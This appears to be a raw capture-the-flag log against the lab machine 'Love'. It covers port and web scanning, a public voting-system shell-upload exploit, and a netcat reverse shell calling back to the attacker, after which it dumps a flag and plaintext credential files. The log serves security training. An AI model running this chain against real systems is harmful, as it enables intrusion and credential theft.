Love

$ nmap -p- -T4 -A 10.10.10.239
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   Kerberos, NCP, NULL, afp: 
|_    Host '10.10.14.133' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-05-05T21:46:26+00:00; +32m26s from scanner time.
| tls-alpn: 
|_  http/1.1
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 2h17m26s, deviation: 3h30m01s, median: 32m25s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-05T14:46:07-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-05T21:46:09
|_  start_date: N/A
$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
$ dirb http://10.10.10.239
---- Scanning URL: http://10.10.10.239/ ----
==> DIRECTORY: http://10.10.10.239/admin/                                                                                                                                         
==> DIRECTORY: http://10.10.10.239/Admin/                                                                                                                                         
==> DIRECTORY: http://10.10.10.239/ADMIN/                                                                                                                                         
+ http://10.10.10.239/aux (CODE:403|SIZE:302)                                                                                                                                     
+ http://10.10.10.239/cgi-bin/ (CODE:403|SIZE:302)                                                                                                                                
+ http://10.10.10.239/com1 (CODE:403|SIZE:302)                                                                                                                                    
+ http://10.10.10.239/com2 (CODE:403|SIZE:302)                                                                                                                                    
+ http://10.10.10.239/com3 (CODE:403|SIZE:302)                                                                                                                                    
+ http://10.10.10.239/con (CODE:403|SIZE:302)                                                                                                                                     
==> DIRECTORY: http://10.10.10.239/dist/                                                                                                                                          
+ http://10.10.10.239/examples (CODE:503|SIZE:402)                                                                                                                                
==> DIRECTORY: http://10.10.10.239/images/                                                                                                                                        
==> DIRECTORY: http://10.10.10.239/Images/                                                                                                                                        
==> DIRECTORY: http://10.10.10.239/includes/                                                                                                                                      
+ http://10.10.10.239/index.php (CODE:200|SIZE:4388)                                                                                                                              
+ http://10.10.10.239/licenses (CODE:403|SIZE:421)                                                                                                                                
+ http://10.10.10.239/lpt1 (CODE:403|SIZE:302)                                                                                                                                    
+ http://10.10.10.239/lpt2 (CODE:403|SIZE:302)                                                                                                                                    
+ http://10.10.10.239/nul (CODE:403|SIZE:302)                                                                                                                                     
+ http://10.10.10.239/phpmyadmin (CODE:403|SIZE:302)                                                                                                                              
==> DIRECTORY: http://10.10.10.239/plugins/                                                                                                                                       
+ http://10.10.10.239/prn (CODE:403|SIZE:302)                                                                                                                                     
+ http://10.10.10.239/server-info (CODE:403|SIZE:421)                                                                                                                             
+ http://10.10.10.239/server-status (CODE:403|SIZE:421)                                                                                                                           
+ http://10.10.10.239/webalizer (CODE:403|SIZE:302)                                                                                                                               
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/admin/ ----
+ http://10.10.10.239/admin/aux (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/admin/com1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/admin/com2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/admin/com3 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/admin/con (CODE:403|SIZE:302)                                                                                                                               
==> DIRECTORY: http://10.10.10.239/admin/includes/                                                                                                                                
+ http://10.10.10.239/admin/index.php (CODE:200|SIZE:6198)                                                                                                                        
+ http://10.10.10.239/admin/lpt1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/admin/lpt2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/admin/nul (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/admin/prn (CODE:403|SIZE:302)                                                                                                                               
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/Admin/ ----
+ http://10.10.10.239/Admin/aux (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/Admin/com1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/Admin/com2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/Admin/com3 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/Admin/con (CODE:403|SIZE:302)                                                                                                                               
==> DIRECTORY: http://10.10.10.239/Admin/includes/                                                                                                                                
+ http://10.10.10.239/Admin/index.php (CODE:200|SIZE:6198)                                                                                                                        
+ http://10.10.10.239/Admin/lpt1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/Admin/lpt2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/Admin/nul (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/Admin/prn (CODE:403|SIZE:302)                                                                                                                               
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/ADMIN/ ----
+ http://10.10.10.239/ADMIN/aux (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/ADMIN/com1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/ADMIN/com2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/ADMIN/com3 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/ADMIN/con (CODE:403|SIZE:302)                                                                                                                               
==> DIRECTORY: http://10.10.10.239/ADMIN/includes/                                                                                                                                
+ http://10.10.10.239/ADMIN/index.php (CODE:200|SIZE:6198)                                                                                                                        
+ http://10.10.10.239/ADMIN/lpt1 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/ADMIN/lpt2 (CODE:403|SIZE:302)                                                                                                                              
+ http://10.10.10.239/ADMIN/nul (CODE:403|SIZE:302)                                                                                                                               
+ http://10.10.10.239/ADMIN/prn (CODE:403|SIZE:302)                                                                                                                               
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/Admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                  
---- Entering directory: http://10.10.10.239/ADMIN/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

Voting System 1.0 Shell Upload
https://packetstormsecurity.com/files/161031/Voting-System-1.0-Shell-Upload.html
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888

kali@kali:~/0.htb/machines/Love239$ python3 shellupload.py 
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully


kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.239] 53061
b374k shell : connected

Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>
C:\xampp\htdocs\omrs\images>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

05/06/2021  06:08 AM    <DIR>          .
05/06/2021  06:08 AM    <DIR>          ..
05/06/2021  06:08 AM             5,632 D3fa1t_shell.exe
05/18/2018  08:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  03:53 PM                 0 index.html.txt
01/27/2021  12:08 AM               844 index.jpeg
08/24/2017  04:00 AM            26,644 profile.jpg
05/06/2021  06:08 AM             6,495 shell.php
               6 File(s)         43,855 bytes
               2 Dir(s)   2,232,213,504 bytes free

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\Users\Phoebe\Desktop>type user.txt
type user.txt
8086de462d74e656846ea860579218e5
C:\xampp\htdocs\omrs\images>cd ..
cd ..

C:\xampp\htdocs\omrs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs

04/13/2021  09:54 AM    <DIR>          .
04/13/2021  09:54 AM    <DIR>          ..
04/12/2021  08:27 AM    <DIR>          admin
04/12/2021  08:29 AM    <DIR>          bower_components
04/12/2021  08:29 AM    <DIR>          dist
05/18/2018  10:50 AM             7,480 home.php
05/06/2021  06:08 AM    <DIR>          images
04/12/2021  08:29 AM    <DIR>          includes
05/16/2018  12:34 PM             1,572 index.php
05/16/2018  12:31 PM               668 login.php
04/26/2018  01:25 PM                84 logout.php
04/12/2021  08:29 AM    <DIR>          plugins
05/17/2018  11:02 AM             1,705 preview.php
05/18/2018  10:49 AM             1,502 submit_ballot.php
04/12/2021  08:29 AM    <DIR>          tcpdf
04/12/2021  08:29 AM    <DIR>          votesystem
               6 File(s)         13,011 bytes
              10 Dir(s)   2,232,205,312 bytes free

C:\xampp\htdocs\omrs>

C:\xampp\htdocs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs

04/12/2021  08:29 AM    <DIR>          .
04/12/2021  08:29 AM    <DIR>          ..
08/27/2019  07:02 AM             3,607 applications.html
08/27/2019  07:02 AM               177 bitnami.css
04/12/2021  08:16 AM    <DIR>          dashboard
07/16/2015  08:32 AM            30,894 favicon.ico
04/12/2021  08:29 AM    <DIR>          FFS
04/12/2021  08:16 AM    <DIR>          img
07/16/2015  08:32 AM               260 index.php
04/13/2021  09:54 AM    <DIR>          omrs
04/12/2021  08:29 AM    <DIR>          passwordmanager
04/12/2021  08:16 AM    <DIR>          webalizer
04/12/2021  08:16 AM    <DIR>          xampp
               4 File(s)         34,938 bytes
               9 Dir(s)   2,208,567,296 bytes free


Directory of C:\xampp\htdocs\passwordmanager

04/12/2021  08:29 AM    <DIR>          .
04/12/2021  08:29 AM    <DIR>          ..
04/12/2021  12:25 PM                45 creds.txt
01/27/2021  06:32 PM             4,720 index.php
               2 File(s)          4,765 bytes
               2 Dir(s)   2,208,235,520 bytes free

C:\xampp\htdocs\passwordmanager>type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!

C:\xampp\webdav>type webdav.txt
type webdav.txt
WEB-DAV f�r den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente �ber den Apache2.

Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: http://localhost/webdav/
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben. 
Lokales Directory: /xampp/webdav/

C:\xampp>type passwords.txt
type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).   

WinRM (port 5985,5986)





Navigation